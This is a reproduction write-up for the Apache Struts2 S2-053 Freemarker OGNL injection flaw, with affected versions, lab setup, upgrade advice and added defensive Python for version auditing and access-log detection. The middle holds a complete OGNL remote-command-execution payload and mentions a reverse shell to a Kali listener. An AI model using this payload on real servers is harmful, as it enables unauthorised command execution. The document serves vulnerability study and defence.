Apache Struts2 Freemarker tag remote command execution (CVE-2017-12611, S2-053) vulnerability reproduction
I. Vulnerability description
When the Struts2 Freemarker tag engine is used with OGNL expression evaluation enabled, user-supplied data is not evaluated as OGNL directly; however, once Freemarker has rendered it, the result is an expression that OGNL then parses a second time. This double evaluation leads to arbitrary command execution.
II. Affected versions
Struts 2.0.1 - Struts 2.3.33
Struts 2.5 - Struts 2.5.10
III. Building the vulnerable environment
1. The environment is built with Docker.
IV. Vulnerability reproduction
1. Start the environment.
2. Access it in the browser.
The PoC is as follows:
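A defender's first step against S2-053 is finding out whether a deployed build falls inside the affected ranges above. The following is an added example, not code from the original write-up or from the Struts project; it reads the struts2-core version from a constructed pom.xml (resolving a ${struts2.version} property, which is how many projects declare it) and compares it against the two inclusive ranges stated in this section. The sample pom is constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Affected ranges as stated in the advisory (both ends inclusive).
AFFECTED_RANGES = (
    ((2, 0, 1), (2, 3, 33)),
    ((2, 5, 0), (2, 5, 10)),
)
MAVEN_NS = "http://maven.apache.org/POM/4.0.0"


def parse_version(text):
    """Reduce '2.5', '2.5.10' or '2.5.10.1' to a (major, minor, patch) tuple.
    A fourth component or a qualifier such as '-SNAPSHOT' is ignored."""
    m = re.match(r"^\s*(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        raise ValueError(f"unrecognised Struts version: {text!r}")
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def is_affected(version):
    """True if the version falls inside one of the affected ranges."""
    v = parse_version(version)
    return any(lo <= v <= hi for lo, hi in AFFECTED_RANGES)


def struts_core_version(pom_xml):
    """Return the struts2-core version declared in a pom.xml string, resolving
    ${property} references against <properties>; None if it is not declared."""
    root = ET.fromstring(pom_xml)
    ns = {"m": MAVEN_NS}
    props = {p.tag.split("}")[-1]: (p.text or "").strip()
             for p in root.findall("m:properties/*", ns)}
    for dep in root.iter(f"{{{MAVEN_NS}}}dependency"):
        if dep.findtext("m:artifactId", namespaces=ns) == "struts2-core":
            raw = dep.findtext("m:version", default="", namespaces=ns)
            return re.sub(r"\$\{([^}]+)\}",
                          lambda mm: props.get(mm.group(1), mm.group(0)),
                          raw).strip()
    return None


# Constructed sample pom.xml (not taken from any real project).
SAMPLE_POM = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <modelVersion>4.0.0</modelVersion>
  <properties>
    <struts2.version>2.5.10</struts2.version>
  </properties>
  <dependencies>
    <dependency>
      <groupId>org.apache.struts</groupId>
      <artifactId>struts2-core</artifactId>
      <version>${struts2.version}</version>
    </dependency>
  </dependencies>
</project>
"""


def audit_pom(pom_xml):
    """Return (version, affected) for the pom, or (None, False) if Struts is absent."""
    ver = struts_core_version(pom_xml)
    return (ver, is_affected(ver)) if ver else (None, False)


if __name__ == "__main__":
    print(audit_pom(SAMPLE_POM))
```

The check deliberately ignores a fourth version component, so a build such as 2.5.10.1 is still reported as inside the 2.5 - 2.5.10 range; the version string actually shipped in the deployed WAR (the MANIFEST of struts2-core) is the authoritative source when the pom and the artefact disagree.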
%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))} Note: the command to be executed is set at (#cmd='id').
3. Check which groups the user belongs to.
4. Reverse shell: send a shell back to the Kali machine.
5. Start a listener on the Kali side; the reverse shell from the target is received successfully.
V. Vulnerability defence
1. Upgrade Apache Struts to the latest version.
2. Do not populate Freemarker tag values from the request.
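Beyond patching, operations teams usually want to know whether an exposed Struts instance has already been probed. The following is an added example written for this page, not code from the original write-up; it scans web server access log lines in the combined format, URL-decodes the request target until it is stable (injection attempts are frequently double-encoded), and flags the structural markers that the PoC above relies on: the expression delimiters, the sandbox fields it tampers with (_memberAccess, getExcludedPackageNames, getExcludedClasses), OGNL's @class@member static-access syntax, and process spawning. The indicator names, the regular expressions and the three sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Indicator fragments taken from the structure of the S2-053 proof of concept.
INDICATORS = {
    "ognl-delimiter": r"%\{|\$\{",
    "sandbox-tamper": r"_memberAccess|DEFAULT_MEMBER_ACCESS|getExcludedPackageNames|getExcludedClasses",
    "static-access": r"@[\w.]+@\w+",            # @class@member, e.g. @java.lang.System@getProperty
    "process-spawn": r"ProcessBuilder|getRuntime",
}
INDICATOR_RE = {name: re.compile(rx) for name, rx in INDICATORS.items()}

# Combined log format: ip ident user [timestamp] "METHOD target PROTOCOL" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def decode_fully(s, max_rounds=3):
    """URL-decode until the string stops changing; a bounded loop avoids spinning on junk."""
    for _ in range(max_rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s


def scan_line(line):
    """Return a finding dict for a suspicious request, or None for a clean or unparsable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = decode_fully(m.group("target"))
    matched = [name for name, rx in INDICATOR_RE.items() if rx.search(target)]
    if not matched:
        return None
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "status": m.group("status"),
        "indicators": matched,
        "decoded_target": target,
    }


def scan_log(lines):
    """Run scan_line over an iterable of log lines and keep only the findings."""
    return [f for f in map(scan_line, lines) if f]


# Constructed sample lines. The second one carries a double-encoded expression fragment
# (%{(#_memberAccess)} after decoding); it is a marker, not a working payload.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2017:13:55:36 +0000] "GET /hello.action?name=Alice HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Oct/2017:13:56:01 +0000] "GET /hello.action?name=%2525%257B%2528%2523_memberAccess%2529%257D HTTP/1.1" 200 1140',
    '10.0.0.9 - - [10/Oct/2017:13:57:12 +0000] "POST /login.action HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Two caveats when using this in practice. Access logs only record the request line, so a payload submitted in a POST body or a header is invisible here; the same indicator set belongs in a request filter or WAF rule in front of the application, where the body is available. And because S2-053 is triggered by a value that is later rendered through a Freemarker tag, a hit with a 200 status is not by itself proof of execution; correlate it with child processes of the application server, which the PoC's ProcessBuilder call would produce.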